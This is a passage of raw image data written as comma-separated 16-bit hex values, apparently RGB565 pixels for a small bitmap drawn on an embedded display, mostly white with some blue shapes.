0xffff, 0xf7ff, 0xefff, 0x7558, 0x1b74, 0x03b7, 0x6579, 0xdfff, 0xf7ff, 0xffff, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xcfff, 0x4d18, 0x0bb6, 0x2418, 0x9edf, 0xe7ff, 0xffdd, 0xfffe, 0xffdf, 0xf7df, 0xffff, 0xf7be, 0xf7bd, 0xffff, 0xe7ff, 0xdfff, 0xe7ff, 0xe7df, 0xefdf, 0xefff, 0xdfff, 0xd7ff, 0xdfff, 0xefff, 0xefdf, 0xefff, 0xdfff, 0xc7ff, 0x655c, 0x1355, 0x1bb5, 0xaf7f, 0xefff, 0xfffe, 0xffff, 0xefff, 0xf7de, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe7df, 0x0a92, 0x0295, 0x8dbd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xc77f, 0x12f3, 0x0273, 0x8dfc, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffbd, 0xfffd, 0xffff, 0xefff, 0xefff, 0xefff, 0xefff, 0xe7ff, 0xefff, 0xf7ff, 0xefff, 0xe7ff, 0x9e9f, 0x0234, 0x135b, 0x033a, 0x1359, 0x12b4, 0xaeff, 0xe7ff, 0xefff, 0xefff, 0xf7ff, 0xe7ff, 0xe7ff, 0xe7ff, 0xe7ff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xb75f, 0x1bb4, 0x0bd6, 0x44f9, 0xd7ff, 0xffff, 0xffdd, 0xffdd, 0xf7fe, 0xefff, 0xf7ff, 0xffde, 0xffbc, 0xf7ff, 0x7c72, 0xc6bc, 0xefff, 0xf7df, 0xf7df, 0xfffe, 0xfffe, 0xfffe, 0xffbe, 0xffbf, 0xffdf, 0xf7bd, 0xefff, 0xaf1f, 0x2bf8, 0x0bd5, 0x54f8, 0xe7ff, 0xf79e, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xfffe, 0xfffd, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xe7ff, 0x555a, 0x0b95, 0x2c57, 0xbf7f, 0xf7ff, 0xf7ff, 0xffde, 0xffff, 0xf7bf, 0xffff, 0xf7fe, 0xf7de, 0xf7ff, 0xae7d, 0x3bb5, 0x2bd7, 0x2b77, 0x3397, 0x33b7, 0x2376, 0x2396, 0x2397, 0x2b96, 0x3bb7, 0x3b97, 0x2376, 0x33f6, 0x8579, 0xdfff, 0x75bc, 0x0bb6, 0x0bb4, 0xbf7f, 0xf7fe, 0xf7fe, 0xe7ff, 0xefff, 0xfffc, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xdfbf, 0x12b3, 0x0294, 0x85bc, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xc77e, 0x12f3, 0x0273, 0x8dfc, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbd, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffdf, 0xffff, 0xe7ff, 0x963d, 0x0294, 0x033a, 0x035b, 0x0b38, 0x12b3, 0xaebf, 0xf7ff, 0xfffe, 0xf7df, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xefbe, 0xffff, 0xf7df, 0xffff, 0xffbe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbf, 0xffde, 0xf7ff, 0xbf7f, 0x13b5, 0x0bb6, 0x65dc, 0xe7ff, 0xffff, 0xffbe, 0xffbe, 0xffdd, 0xf7fe, 0xf7ff, 0xf7ff, 0xf7bf, 0xfffe, 0x8d39, 0x6391, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffdd, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdd, 0xf7de, 0xf7ff, 0xd75f, 0x2457, 0x1bb4, 0x5cd7, 0xe7ff, 0xffff, 0xffff, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0x7558, 0x1373, 0x2416, 0xd7ff, 0xf7ff, 0xffbd, 0xffff, 0xffff, 0xffbf, 0xffff, 0xfffe, 0xf7fc, 0xf7ff, 0xd73f, 0x09ef, 0x12b3, 0x0271, 0x1292, 0x0a0f, 0x126f, 0x12d0, 0x0a90, 0x1251, 0x1a70, 0x1a2f, 0x09f0, 0x12b3, 0x0271, 0x0a0c, 0xae3b, 0xe7ff, 0x7e1d, 0x0b73, 0x2bf3, 0xd7ff, 0xefff, 0xe7de, 0xf7ff, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xdfbf, 0x1ab2, 0x0a72, 0x8d99, 0xfffd, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffde, 0xffde, 0xffde, 0xffde, 0xffde, 0xffde, 0xffde, 0xffde, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xffde, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffde, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xffde, 0xfffd, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xfffe, 0xffdf, 0xffdd, 0xfffc, 0xcf5d, 0x1af2, 0x0272, 0x8ddc, 0xf7ff, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffdd, 0xfffd, 0xffdc, 0xfffd, 0xfffe, 0xffbd, 0xfffc, 0xf7fd, 0xb6dd, 0x0252, 0x1359, 0x0b59, 0x1316, 0x1a71, 0xc6ff, 0xffff, 0xfffc, 0xfffc, 0xffbe, 0xffde, 0xffbd, 0xffde, 0xffbe, 0xffbe, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xfffe, 0xd79f, 0x2bf6, 0x0355, 0x6e3e, 0xdfff, 0xf7dd, 0xff9c, 0xffdf, 0xffff, 0xf7df, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xcefd, 0x116c, 0xd73f, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xffdd, 0xffff, 0xf7df, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xfffe, 0xd7ff, 0x2bf5, 0x1394, 0x6d7a, 0xefff, 0xffbe, 0xffde, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7fe, 0xdfff, 0x9ebd, 0x1b31, 0x3414, 0xcfff, 0xefff, 0xf7be, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffdf, 0xffdd, 0xfffc, 0xf7ff, 0xa61f, 0x098f, 0x6cda, 0xdfff, 0xefff, 0xf7ff, 0xe7ff, 0xdfff, 0xefff, 0xffff, 0xefff, 0xf7ff, 0xf7ff, 0xe7ff, 0x967f, 0x0a4f, 0x6496, 0xf7ff, 0xf7ff, 0x6538, 0x1395, 0x2c36, 0xdfff, 0xffde, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xe7df, 0x2292, 0x1252, 0x8d9a, 0xfffe, 0xfffe, 0xfffd, 0xfffd, 0xfffd, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffd, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffd, 0xffde, 0xffdf, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffdf, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffde, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xfffe, 0xfffe, 0xffdd, 0xfffd, 0xcf5e, 0x22d2, 0x1252, 0x95dc, 0xf7ff, 0xffff, 0xffdf, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffdf, 0xfffe, 0xfffd, 0xfffd, 0xfffd, 0xfffd, 0xff9d, 0xffbe, 0xffbd, 0xffff, 0x9dfa, 0x0a30, 0x1b37, 0x1357, 0x2377, 0x1a50, 0xb65d, 0xffff, 0xfffd, 0xfffd, 0xffde, 0xff9d, 0xfffe, 0xffbd, 0xffde, 0xffbe, 0xffbe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffdf, 0xdfff, 0x4c36, 0x1b35, 0x655b, 0xdfff, 0xeffd, 0xfffc, 0xffff, 0xffdf, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xcf3f, 0x09ad, 0x7436, 0xefff, 0xf7ff, 0xf7fe, 0xffff, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffdf, 0xff9f, 0xffff, 0xfffc, 0xefdf, 0xc7ff, 0x2436, 0x0b52, 0x967c, 0xefff, 0xf7df, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xffff, 0xffff,
0xffbf, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xeffe, 0xc7df, 0x1bb4, 0x23b4, 0xb6fe, 0xffff, 0xfffe, 0xffff, 0xf7df, 0xffff, 0xf7fe, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xf7ff, 0xae5f, 0x098f, 0x74b8, 0xf7ff, 0xf79f, 0xdefd, 0xcf3d, 0xdfde, 0xf7ff, 0xf77e, 0xcf5f, 0xd75c, 0xef7b, 0xffff, 0xa65e, 0x0230, 0x6539, 0xefff, 0xffdd, 0xe7ff, 0x3499, 0x03b6, 0x861d, 0xffff, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xdfff, 0x1273, 0x0a75, 0x85be, 0xe7ff, 0xdfdf, 0xdfdf, 0xdfdf, 0xdfdf, 0xdfdf, 0xdfdf, 0xdfff, 0xdfff, 0xe7ff, 0xe7ff, 0xe7ff, 0xe7ff, 0xe7ff, 0xe7ff, 0xe7ff, 0xe7ff, 0xdfff, 0xe7ff, 0xe7df, 0xe7df, 0xe7bf, 0xefbf, 0xe7df, 0xe7ff, 0xdfff, 0xdfff, 0xe7ff, 0xe7df, 0xe7ff, 0xe7ff, 0xe7df, 0xefdf, 0xdfff, 0xe7df, 0xe7df, 0xe7df, 0xe7df, 0xe7df, 0xe7df, 0xe7bf, 0xe7df, 0xbf3f, 0x1ad4, 0x0a53, 0x95bd, 0xf7ff, 0xffff, 0xffdf, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xf7ff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xe7ff, 0xaedf, 0x0251, 0x1357, 0x1358, 0x12f6, 0x22d4, 0xbeff, 0xefff, 0xefff, 0xefff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xffff, 0xffde, 0xffff, 0xffde, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0x7e7e, 0x1313, 0x4c78, 0xdfff, 0xf7de, 0xfffd, 0xf7dd, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xe7bf, 0x4353, 0x01f0, 0xdf9f, 0xefff, 0xf7ff, 0xf7fe, 0xf7fe, 0xffff, 0xf7ff, 0xf7df, 0x8c94, 0xe77f, 0xf7ff, 0xf7ff, 0xffdf, 0xffbf, 0xffff, 0xf7fe, 0xffde, 0xefff, 0x9f1f, 0x13b4, 0x2bd4, 0xc7df, 0xe7ff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xfffe, 0xffff, 0xffff,
0xffdf, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xe7ff, 0x6d59, 0x1374, 0x6dbc, 0xefff, 0xffde, 0xffbe, 0xefdf, 0xf7ff, 0xfffe, 0xffff, 0xf7ff, 0xf7df, 0xffff, 0xfffe, 0xefff, 0xa63f, 0x09af, 0x7cb7, 0xf7ff, 0xbe3c, 0x19ad, 0x122e, 0x64f6, 0xe7ff, 0xa597, 0x020f, 0x1a6d, 0x7cf4, 0xefff, 0x9e3f, 0x020f, 0x64f7, 0xf7ff, 0xffde, 0xf7ff, 0xaf5f, 0x1bf5, 0x2394, 0xd7bf, 0xffff, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xcfdf, 0x12b4, 0x133b, 0x12f7, 0x2b35, 0x2335, 0x2335, 0x2335, 0x2335, 0x2334, 0x2334, 0x2314, 0x2314, 0x2335, 0x2b35, 0x2b55, 0x2b55, 0x2b35, 0x2b35, 0x2b35, 0x2b35, 0x2355, 0x2b34, 0x3354, 0x2b55, 0x2316, 0x2b36, 0x3375, 0x2333, 0x2354, 0x2355, 0x2335, 0x2b34, 0x2b34, 0x2b34, 0x2b34, 0x3314, 0x2b36, 0x2b15, 0x2b15, 0x2af4, 0x22f3, 0x2314, 0x2314, 0x2334, 0x2335, 0x1b36, 0x1337, 0x0a53, 0x95dd, 0xffff, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xe7ff, 0xcfbf, 0xb73f, 0x8dfd, 0x85bd, 0x859d, 0x6499, 0x5479, 0x4c9a, 0x02d4, 0x0337, 0x0b79, 0x0b38, 0x0af7, 0x3bf9, 0x5459, 0x5c98, 0x6519, 0x7d9c, 0x7dfc, 0x965d, 0xbf3f, 0xc71d, 0xefff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7de, 0xefff, 0xd7bf, 0x0bb5, 0x23d4, 0xb77f, 0xefff, 0xffbe, 0xffbd, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xefff, 0x4b94, 0x0a50, 0x4498, 0xf7ff, 0xf7fe, 0xfffe, 0xfffe, 0xf7ff, 0xf7ff, 0xefdf, 0xefff, 0x222e, 0x4b74, 0xcf7f, 0xf7ff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffbe, 0xffff, 0xe7ff, 0x6579, 0x0b93, 0x65bb, 0xd7ff, 0xffff, 0xffde, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff,
0xffff, 0xfffe, 0xffde, 0xffde, 0xffff, 0xefff, 0xbf7f, 0x2393, 0x2bd4, 0xcfff, 0xf7ff, 0xffdf, 0xffbe, 0xffff, 0xfffe, 0xfffc, 0xfffe, 0xffff, 0xffff, 0xfffd, 0xfffb, 0xf7ff, 0xa63e, 0x11ce, 0x7cb6, 0xf7ff, 0xbe5e, 0x09ae, 0x0a70, 0x6518, 0xe7ff, 0x9d58, 0x0293, 0x022d, 0x7538, 0xd7ff, 0x9e7f, 0x120f, 0x7cf7, 0xefff, 0xffff, 0xf7ff, 0xe7ff, 0x75da, 0x1374, 0x659d, 0xe7ff, 0xfffb, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7fd, 0xeffd, 0xcfff, 0x01ef, 0x0275, 0x0274, 0x0a72, 0x0253, 0x0253, 0x0273, 0x0273, 0x0a73, 0x0a73, 0x0a73, 0x0a73, 0x0a73, 0x0a73, 0x0a73, 0x0a73, 0x0a73, 0x0a73, 0x0a53, 0x0a53, 0x0273, 0x0a51, 0x0a72, 0x0232, 0x0ad6, 0x0af6, 0x0252, 0x0a72, 0x0292, 0x0293, 0x0a73, 0x0a72, 0x0a72, 0x0a72, 0x0a72, 0x0a72, 0x0a74, 0x0a73, 0x1253, 0x1253, 0x0a73, 0x0293, 0x0293, 0x0293, 0x02b3, 0x02b3, 0x0292, 0x01ee, 0x8d59, 0xf7ff, 0xfffe, 0xfffd, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xe7ff, 0x5c55, 0x01ef, 0x0271, 0x0ab3, 0x0a72, 0x12b4, 0x0ab4, 0x0ad4, 0x1397, 0x0b97, 0x0b78, 0x0b78, 0x1358, 0x0af5, 0x0ad4, 0x12f4, 0x0ad3, 0x0ab2, 0x02d2, 0x0ab1, 0x01ec, 0x4b91, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffbe, 0xffff, 0xe7ff, 0x6d58, 0x0b94, 0x6db9, 0xe7ff, 0xffff, 0xffbf, 0xffdf, 0xff9e, 0xffdf, 0xffff, 0xffdd, 0xfffe, 0xf7ff, 0x6499, 0x0a73, 0x1292, 0xaf1f, 0xfffe, 0xffde, 0xffbe, 0xffff, 0xf7ff, 0xffff, 0xf7ff, 0xbebf, 0x0a31, 0x0a94, 0x22d2, 0xdfbf, 0xf7ff, 0xf7fe, 0xfffe, 0xffde, 0xf7df, 0xffbd, 0xffde, 0xd7ff, 0x23f5, 0x0bb4, 0xaf9f, 0xefff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff,
